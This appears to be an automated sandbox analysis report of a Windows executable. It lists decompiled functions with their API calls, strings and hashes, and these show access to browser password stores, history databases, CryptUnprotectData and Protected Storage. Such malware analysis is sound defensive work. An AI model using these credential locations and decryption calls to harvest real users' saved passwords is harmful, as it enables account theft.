                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 0040815F: free.MSVCRT(?,00408536,00000000,?,00000000), ref: 00408162
                                                                                                      • Part of subcall function 0040815F: free.MSVCRT(?,?,00408536,00000000,?,00000000), ref: 0040816A
                                                                                                      • Part of subcall function 004082DE: free.MSVCRT(00000000,00408663,00000000,?,00000000), ref: 004082E5
                                                                                                      • Part of subcall function 00409832: memset.MSVCRT ref: 00409856
                                                                                                      • Part of subcall function 00409832: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 004098CB
                                                                                                      • Part of subcall function 00409832: wcschr.MSVCRT ref: 004098E2
                                                                                                      • Part of subcall function 00409832: wcschr.MSVCRT ref: 00409902
                                                                                                      • Part of subcall function 00409832: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 00409927
                                                                                                      • Part of subcall function 00409832: GetLastError.KERNEL32 ref: 00409931
                                                                                                      • Part of subcall function 00409981: memset.MSVCRT ref: 004099F1
                                                                                                      • Part of subcall function 00409981: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,80000001,?,?,?,?,00000000,?), ref: 00409A1F
                                                                                                      • Part of subcall function 00409981: _wcsupr.MSVCRT ref: 00409A39
                                                                                                      • Part of subcall function 00409981: memset.MSVCRT ref: 00409A88
                                                                                                      • Part of subcall function 00409981: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,80000001,80000001,?,000000FF,?,?,?,?,00000000), ref: 00409AB3
                                                                                                      • Part of subcall function 004038B2: LoadLibraryW.KERNEL32(advapi32.dll,?,00409DD4,?,https://login.yahoo.com/config/login,00000000,http://www.facebook.com/,00000000,https://www.google.com/accounts/servicelogin,00000000,?,00000000,?,00410971,?,?), ref: 004038BD
                                                                                                      • Part of subcall function 004038B2: GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 004038D1
                                                                                                      • Part of subcall function 004038B2: GetProcAddress.KERNEL32(?,CryptReleaseContext), ref: 004038DD
                                                                                                      • Part of subcall function 004038B2: GetProcAddress.KERNEL32(?,CryptCreateHash), ref: 004038E9
                                                                                                      • Part of subcall function 004038B2: GetProcAddress.KERNEL32(?,CryptGetHashParam), ref: 004038F5
                                                                                                      • Part of subcall function 004038B2: GetProcAddress.KERNEL32(?,CryptHashData), ref: 00403901
                                                                                                      • Part of subcall function 004038B2: GetProcAddress.KERNEL32(?,CryptDestroyHash), ref: 0040390D
                                                                                                    • _wcslwr.MSVCRT ref: 00409E26
                                                                                                    • wcslen.MSVCRT ref: 00409E3B
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$freememset$CacheEntryEnumFindValuewcschr$ErrorFirstLastLibraryLoadNext_wcslwr_wcsuprwcslen
                                                                                                    • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                                                                                                    • API String ID: 4091582287-4196376884
                                                                                                    • Opcode ID: 33a156cccd722fa866199f34210534946aee1db9968a8264b58c335345bf517e
                                                                                                    • Instruction ID: 01c01e5a044297ea89f551272de4eb930a01c827584df84de249b9241f260264
                                                                                                    • Opcode Fuzzy Hash: 33a156cccd722fa866199f34210534946aee1db9968a8264b58c335345bf517e
                                                                                                    • Instruction Fuzzy Hash: 4331DB31600104A6CB20BB6ACD4699F7779EF84744F2508BEB845BB2C7DB7CDD81D698
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00409409, Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 91COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 0040942C
                                                                                                    • memset.MSVCRT ref: 00409444
                                                                                                      • Part of subcall function 00412B44: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001A,00000000), ref: 00412B7E
                                                                                                    • wcslen.MSVCRT ref: 00409460
                                                                                                    • wcslen.MSVCRT ref: 0040946F
                                                                                                    • wcslen.MSVCRT ref: 004094B6
                                                                                                    • wcslen.MSVCRT ref: 004094C5
                                                                                                      • Part of subcall function 00407974: wcscpy.MSVCRT ref: 0040797C
                                                                                                      • Part of subcall function 00407974: wcscat.MSVCRT ref: 0040798B
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: wcslen$memset$FolderPathSpecialwcscatwcscpy
                                                                                                    • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                                                                                    • API String ID: 2036768262-2114579845
                                                                                                    • Opcode ID: d633ba8a98f14ee60e932f4db1a25ed397b292380476260375e10a9e4a085382
                                                                                                    • Instruction ID: 289f8e9e4eb1e354a4f38dc36c9e0e89cd7ba751287d0d55b1d476c05f66ce08
                                                                                                    • Opcode Fuzzy Hash: d633ba8a98f14ee60e932f4db1a25ed397b292380476260375e10a9e4a085382
                                                                                                    • Instruction Fuzzy Hash: 5B21B9B394411C96DB20EA91DC85EDB73ACEF04358F5405FBF509E2082EA789E848A5D
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00441F56, Relevance: 10.7, APIs: 1, Strings: 6, Instructions: 219COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: memcpy
                                                                                                    • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                                                                                                    • API String ID: 3510742995-2641926074
                                                                                                    • Opcode ID: e55c62c290dfaea63e3b7417d0a0d0b3e56aa5575d3de182bf0c975d4bae8956
                                                                                                    • Instruction ID: bd3df3e630e96bb601bbd3f8d8ac4668e94fcceea3781d0d9446ca094d1315dd
                                                                                                    • Opcode Fuzzy Hash: e55c62c290dfaea63e3b7417d0a0d0b3e56aa5575d3de182bf0c975d4bae8956
                                                                                                    • Instruction Fuzzy Hash: 167107B1604301BFF310AF1ACCC1A6ABBA8BF44318F14452FF51897752D7B9AD918B99
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004031F2, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 116COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 0040892A: free.MSVCRT(00000000,0040ECEB,?,?,?,?,?,/deleteregkey,/savelangfile,?,?), ref: 00408931
                                                                                                      • Part of subcall function 0041094B: memset.MSVCRT ref: 004109BD
                                                                                                      • Part of subcall function 0041094B: wcsrchr.MSVCRT ref: 004109D5
                                                                                                      • Part of subcall function 0041094B: memset.MSVCRT ref: 00410ABC
                                                                                                      • Part of subcall function 00410734: SetCurrentDirectoryW.KERNEL32(?,?,?,0040327A,?), ref: 00410781
                                                                                                    • memset.MSVCRT ref: 004032F2
                                                                                                    • memcpy.MSVCRT ref: 00403304
                                                                                                    • wcscmp.MSVCRT ref: 00403330
                                                                                                    • _wcsicmp.MSVCRT ref: 0040336D
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: memset$CurrentDirectory_wcsicmpfreememcpywcscmpwcsrchr
                                                                                                    • String ID: $-/@
                                                                                                    • API String ID: 1763786148-2095467582
                                                                                                    • Opcode ID: d5480935f5ced08e8e5a8ce40cbf53f466d7a83e11192719916a4c0de49dc398
                                                                                                    • Instruction ID: b12ac99bd7e76c7cf942cedcd7472b969def5f4965122b81286642cf005aa111
                                                                                                    • Opcode Fuzzy Hash: d5480935f5ced08e8e5a8ce40cbf53f466d7a83e11192719916a4c0de49dc398
                                                                                                    • Instruction Fuzzy Hash: 54418C71A0C3858AD730DF65C985ADBB7E8BF85314F004C2FE48D93681EB789A498B57
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040F5DD, Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 98COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 0040F809: memset.MSVCRT ref: 0040F825
                                                                                                      • Part of subcall function 0040F809: memset.MSVCRT ref: 0040F83A
                                                                                                      • Part of subcall function 0040F809: wcscat.MSVCRT ref: 0040F863
                                                                                                      • Part of subcall function 0040F809: wcscat.MSVCRT ref: 0040F88C
                                                                                                    • memset.MSVCRT ref: 0040F625
                                                                                                    • wcslen.MSVCRT ref: 0040F63C
                                                                                                    • wcslen.MSVCRT ref: 0040F644
                                                                                                    • wcslen.MSVCRT ref: 0040F69F
                                                                                                    • wcslen.MSVCRT ref: 0040F6AD
                                                                                                      • Part of subcall function 00407974: wcscpy.MSVCRT ref: 0040797C
                                                                                                      • Part of subcall function 00407974: wcscat.MSVCRT ref: 0040798B
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: wcslen$memsetwcscat$wcscpy
                                                                                                    • String ID: history.dat$places.sqlite
                                                                                                    • API String ID: 2541527827-467022611
                                                                                                    • Opcode ID: d1a61088c948d479ce72ae56b5dc9800a017292b908d35849f352519e763f383
                                                                                                    • Instruction ID: 28d9e73348e78dfc0465d19afab0ebb5e88f1d9981b57d03e7d0ddbf3268c668
                                                                                                    • Opcode Fuzzy Hash: d1a61088c948d479ce72ae56b5dc9800a017292b908d35849f352519e763f383
                                                                                                    • Instruction Fuzzy Hash: 23318771D04119DADF10EBA5D885ADDB3B8AF00358F6084BBE504F21D1EB7C9A49CB5C
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00410858, Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 80COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: wcslen$memsetwcscatwcscpy
                                                                                                    • String ID: Login Data$Web Data
                                                                                                    • API String ID: 3932597654-4228647177
                                                                                                    • Opcode ID: 59cd6303466da6337ed88b5b06d022dcaebc9bbbf8f974e8230caae5c782e08f
                                                                                                    • Instruction ID: bd9fa1e16bc6117828fb005414958939156c1ae34a073911d1bb250728875550
                                                                                                    • Opcode Fuzzy Hash: 59cd6303466da6337ed88b5b06d022dcaebc9bbbf8f974e8230caae5c782e08f
                                                                                                    • Instruction Fuzzy Hash: 8221FB3291410C9AEF10FB51DC89EDA736CEF10368F10457BF408E2192EBB89EC4869C
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040F809, Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 57COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 0040F825
                                                                                                    • memset.MSVCRT ref: 0040F83A
                                                                                                      • Part of subcall function 00412B44: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001A,00000000), ref: 00412B7E
                                                                                                      • Part of subcall function 00407465: wcslen.MSVCRT ref: 00407466
                                                                                                      • Part of subcall function 00407465: wcscat.MSVCRT ref: 0040747E
                                                                                                    • wcscat.MSVCRT ref: 0040F863
                                                                                                      • Part of subcall function 00412B44: memset.MSVCRT ref: 00412B9D
                                                                                                      • Part of subcall function 00412B44: RegCloseKey.ADVAPI32(?), ref: 00412C04
                                                                                                      • Part of subcall function 00412B44: wcscpy.MSVCRT ref: 00412C12
                                                                                                    • wcscat.MSVCRT ref: 0040F88C
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: memsetwcscat$CloseFolderPathSpecialwcscpywcslen
                                                                                                    • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                                                                                    • API String ID: 1534475566-1174173950
                                                                                                    • Opcode ID: a4eb593c34f1864ecdca8854dffa41757129dd5437ed8e5f6f1c590be22f824c
                                                                                                    • Instruction ID: 8b2af28ca1ecc151625ed12c9eb7dc771db6412c9e50b3e05d7b19e0ac284704
                                                                                                    • Opcode Fuzzy Hash: a4eb593c34f1864ecdca8854dffa41757129dd5437ed8e5f6f1c590be22f824c
                                                                                                    • Instruction Fuzzy Hash: 440186B194031C66EB20AE368C85ECB672CAF54758F0041BEB505E7142D97C9D884AAD
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00412B44, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 77registryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00412A97: LoadLibraryW.KERNEL32(shell32.dll,0040EAF7,00000000,?,00000002), ref: 00412AA5
                                                                                                      • Part of subcall function 00412A97: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00412ABA
                                                                                                    • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001A,00000000), ref: 00412B7E
                                                                                                    • memset.MSVCRT ref: 00412B9D
                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00412C04
                                                                                                    • wcscpy.MSVCRT ref: 00412C12
                                                                                                      • Part of subcall function 0040793F: GetVersionExW.KERNEL32(00451DA8,0000001A,00412B65), ref: 00407959
                                                                                                    Strings
                                                                                                    • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00412BB8, 00412BC8
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: AddressCloseFolderLibraryLoadPathProcSpecialVersionmemsetwcscpy
                                                                                                    • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                    • API String ID: 2699640517-2036018995
                                                                                                    • Opcode ID: 3c15787cbd9305e2f76120dcdcb0201279046eb2debf382ab71c874352f78975
                                                                                                    • Instruction ID: a4e472aaabc648e25a0fe4963f439daa88a1f2777d7c1866f46a89b54034f032
                                                                                                    • Opcode Fuzzy Hash: 3c15787cbd9305e2f76120dcdcb0201279046eb2debf382ab71c874352f78975
                                                                                                    • Instruction Fuzzy Hash: B9112132804114AAEF24EF5D8E4D9EF737CEB41314F5000A7F914E2151D6E86EE586DE
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004122E7, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • wcschr.MSVCRT ref: 00412301
                                                                                                    • _snwprintf.MSVCRT ref: 00412326
                                                                                                    • WritePrivateProfileStringW.KERNEL32(?,?,?,0044A6DC), ref: 00412344
                                                                                                    • GetPrivateProfileStringW.KERNEL32(?,?,0040FF1D,?,00000000,0044A6DC), ref: 0041235C
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                                                                    • String ID: "%s"
                                                                                                    • API String ID: 1343145685-3297466227
                                                                                                    • Opcode ID: 891fb76bc05f756fcbafc0b3a2422f4cc1b470d4ed1929861fa4decee1faa8ba
                                                                                                    • Instruction ID: 76c74108db7f414e404b777c342c3efd41bd7d85ba2c61de92cf13b67705e403
                                                                                                    • Opcode Fuzzy Hash: 891fb76bc05f756fcbafc0b3a2422f4cc1b470d4ed1929861fa4decee1faa8ba
                                                                                                    • Instruction Fuzzy Hash: F8014F3140521EBBEF215F91ED05FDB3B6AFF04308F144065BD24A01A1D7799571DB58
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00403841, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 43libraryloaderCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • LoadLibraryW.KERNELBASE(crypt32.dll,?,00000000,004026A7,?,00000090,00000000,?), ref: 00403850
                                                                                                    • GetProcAddress.KERNEL32(00000000,CryptUnprotectData), ref: 00403862
                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 00403885
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Library$AddressFreeLoadProc
                                                                                                    • String ID: CryptUnprotectData$crypt32.dll
                                                                                                    • API String ID: 145871493-1827663648
                                                                                                    • Opcode ID: 892e491ceeb3ee68c34d375f9ca0ad785bc03e9804e848820d6a85aa68b784ad
                                                                                                    • Instruction ID: cdad18b0c9ab41927d2d3679b126eec732b645198fcec2a37eb00faeae43eca2
                                                                                                    • Opcode Fuzzy Hash: 892e491ceeb3ee68c34d375f9ca0ad785bc03e9804e848820d6a85aa68b784ad
                                                                                                    • Instruction Fuzzy Hash: 82012C32504A119BC7319F169C48D17FEEAEFE0782725887EF0D5E26A0D3788980CB54
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0041D2A5, Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 165COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: memcmp
                                                                                                    • String ID: @ $SQLite format 3
                                                                                                    • API String ID: 1475443563-3708268960
                                                                                                    • Opcode ID: c06821112da402d855828ebf7a0cbef03d2717eff7e727c1963b044872116036
                                                                                                    • Instruction ID: 174ae87c9dda0ebafb827f8d27f4f997c10604a660a249a667c7a8dc4949c266
                                                                                                    • Opcode Fuzzy Hash: c06821112da402d855828ebf7a0cbef03d2717eff7e727c1963b044872116036
                                                                                                    • Instruction Fuzzy Hash: 7C51BCB1D002199BDB14DF69C8817DEB7F4AF48314F1541ABE804EB246E778EA81CB99
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004092CE, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87fileCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00408E3A: OpenProcess.KERNEL32(00000040,00000000,?,00000104,00000000,?,00000104,00000000,00000000,00000104,Microsoft\Windows\WebCache\WebCacheV01.dat), ref: 00408EAF
                                                                                                      • Part of subcall function 00408E3A: GetCurrentProcess.KERNEL32(00000000,80000000,00000000,00000000), ref: 00408ECE
                                                                                                      • Part of subcall function 00408E3A: DuplicateHandle.KERNELBASE(00000000,00000104,00000000), ref: 00408EDB
                                                                                                      • Part of subcall function 00408E3A: GetFileSize.KERNEL32(00000000,00000000), ref: 00408EF0
                                                                                                      • Part of subcall function 00408E3A: CreateFileMappingW.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000), ref: 00408F1A
                                                                                                      • Part of subcall function 00408E3A: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 00408F2F
                                                                                                      • Part of subcall function 00408E3A: WriteFile.KERNELBASE(?,00000000,00000104,00409515,00000000), ref: 00408F4A
                                                                                                      • Part of subcall function 00408E3A: UnmapViewOfFile.KERNEL32(00000000), ref: 00408F51
                                                                                                      • Part of subcall function 00408E3A: FindCloseChangeNotification.KERNELBASE(?), ref: 00408F5A
                                                                                                    • FindCloseChangeNotification.KERNELBASE(000000FF,000000FF,00000000,?,00409515,000000FF,00000000,00000104,Microsoft\Windows\WebCache\WebCacheV01.dat), ref: 0040939E
                                                                                                      • Part of subcall function 004090C7: memset.MSVCRT ref: 0040919C
                                                                                                      • Part of subcall function 004090C7: wcschr.MSVCRT ref: 004091D4
                                                                                                      • Part of subcall function 004090C7: memcpy.MSVCRT ref: 00409208
                                                                                                    • DeleteFileW.KERNELBASE(?,?,00409515,000000FF,00000000,00000104,Microsoft\Windows\WebCache\WebCacheV01.dat), ref: 004093BF
                                                                                                    • CloseHandle.KERNEL32(000000FF,?,00409515,000000FF,00000000,00000104,Microsoft\Windows\WebCache\WebCacheV01.dat), ref: 004093E6
                                                                                                      • Part of subcall function 00408F91: memset.MSVCRT ref: 00408FD9
                                                                                                      • Part of subcall function 00408F91: _snwprintf.MSVCRT ref: 00409073
                                                                                                      • Part of subcall function 00408F91: free.MSVCRT(000000FF,?,000000FF,00000000,00000104,76022EE0), ref: 004090A7
                                                                                                    Strings
                                                                                                    • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 004092DE
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: File$Close$ChangeFindHandleNotificationProcessViewmemset$CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintffreememcpywcschr
                                                                                                    • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat
                                                                                                    • API String ID: 3931293568-1514811420
                                                                                                    • Opcode ID: cbaa575719fa151e421a110b3fa1bd60fb20afda5acf0fc1629d2657ed41bad4
                                                                                                    • Instruction ID: 82692f54578c64880dd6cc032b62f936ee698f90f7947b46448606327f4d294d
                                                                                                    • Opcode Fuzzy Hash: cbaa575719fa151e421a110b3fa1bd60fb20afda5acf0fc1629d2657ed41bad4
                                                                                                    • Instruction Fuzzy Hash: FA314AB1C006289BCF60DBA5CD856CDF7B8AF44314F1042AB9558B31A2DF756E858F58
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040D7B0, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 68COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: _wcsicmpqsort
                                                                                                    • String ID: /nosort$/sort
                                                                                                    • API String ID: 1579243037-1578091866
                                                                                                    • Opcode ID: bf085d41c54bbab3bb1e59ca376e589e72a7712144c65a149130281b35b1d75d
                                                                                                    • Instruction ID: 5cfb718cfe9b03d5dc54f5fe1467520c712e9d8b44ac1bd4622018e716f1f805
                                                                                                    • Opcode Fuzzy Hash: bf085d41c54bbab3bb1e59ca376e589e72a7712144c65a149130281b35b1d75d
                                                                                                    • Instruction Fuzzy Hash: CA212271B006009FD714BBB5C981E56B3A9FF95314B11013EF855A72D2CB79B810CB99
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040A1DC, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 34libraryloaderCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 004120B1: FreeLibrary.KERNELBASE(?,0040A1E8,00000000,00410988,?,?,?,?,?,00403273,?), ref: 004120BD
                                                                                                    • LoadLibraryW.KERNELBASE(pstorec.dll,00000000,00410988,?,?,?,?,?,00403273,?), ref: 0040A1ED
                                                                                                    • GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 0040A200
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Library$AddressFreeLoadProc
                                                                                                    • String ID: PStoreCreateInstance$pstorec.dll
                                                                                                    • API String ID: 145871493-2881415372
                                                                                                    • Opcode ID: 8aa59404b2e3e80f3a40594b54d45fdf8fda79791107462477d8fd9d120b5601
                                                                                                    • Instruction ID: 169b268f8c3a345e57297c965a7c5dcaa596ca487e59aa61436d70a0ef86399e
                                                                                                    • Opcode Fuzzy Hash: 8aa59404b2e3e80f3a40594b54d45fdf8fda79791107462477d8fd9d120b5601
                                                                                                    • Instruction Fuzzy Hash: D4F0E2752807025BE7307BB59C06B9B76D85F25711F00863EB506E96C0DBBCD4A08B5F
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004127CC, Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • FindResourceW.KERNELBASE(?,?,?), ref: 004127D9
                                                                                                    • SizeofResource.KERNEL32(?,00000000), ref: 004127EA
                                                                                                    • LoadResource.KERNEL32(?,00000000), ref: 004127FA
                                                                                                    • LockResource.KERNEL32(00000000), ref: 00412805
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Resource$FindLoadLockSizeof
                                                                                                    • String ID:
                                                                                                    • API String ID: 3473537107-0
                                                                                                    • Opcode ID: 0ab024a6f978146d496681814bfbacb5dcdc6e1c2710d5bb3ceabee51ceb473c
                                                                                                    • Instruction ID: 19c1f9d968b5f776825091e5a5db7813da24ada964d7dbee510dcceace82445f
                                                                                                    • Opcode Fuzzy Hash: 0ab024a6f978146d496681814bfbacb5dcdc6e1c2710d5bb3ceabee51ceb473c
                                                                                                    • Instruction Fuzzy Hash: 8B01D2367002156BCB296F95DD49A9BBFAEFF963917048136F809DA231DB70C890C6C8
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0044364A, Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ??3@
                                                                                                    • String ID:
                                                                                                    • API String ID: 613200358-0
                                                                                                    • Opcode ID: 9332f847cd8ccde43e7c8ba7153b4f68b5dbedb428ebddff5f7a2d1464ad4282
                                                                                                    • Instruction ID: 6fc2936d2e1aa52947420f846e9f7e745184a6b196eba21052d0efc823bd1a30
                                                                                                    • Opcode Fuzzy Hash: 9332f847cd8ccde43e7c8ba7153b4f68b5dbedb428ebddff5f7a2d1464ad4282
                                                                                                    • Instruction Fuzzy Hash: D1E012A130070322AA24AFBAEA40A03238C2B24B633A5012FB441C3392CAACC840842C
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004388DF, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 967COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    • only a single result allowed for a SELECT that is part of an expression, xrefs: 004389B1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: memset
                                                                                                    • String ID: only a single result allowed for a SELECT that is part of an expression
                                                                                                    • API String ID: 2221118986-1725073988
                                                                                                    • Opcode ID: 86510311bcbfb815920e07b0cbc1b01de95ea861a43db0491f077e2427181714
                                                                                                    • Instruction ID: 327fece870cdb9a7877aba747167268cf0de90ec3677549722ae4f620dae8ba4
                                                                                                    • Opcode Fuzzy Hash: 86510311bcbfb815920e07b0cbc1b01de95ea861a43db0491f077e2427181714
                                                                                                    • Instruction Fuzzy Hash: 7D826A71A00218AFDF21DF59C881AAE7BA1FF08314F14511EFD199B2A2DB79EC41CB95
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004156B6, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24sleepCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • Sleep.KERNEL32(00000064), ref: 004156CF
                                                                                                    • FindCloseChangeNotification.KERNELBASE(?,00000000,00000000,0045262C,00415D23,00000008,00000000,00000000,?,00415EE0,?,00000000), ref: 004156D8
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ChangeCloseFindNotificationSleep
                                                                                                    • String ID: ^A
                                                                                                    • API String ID: 1821831730-3251803456
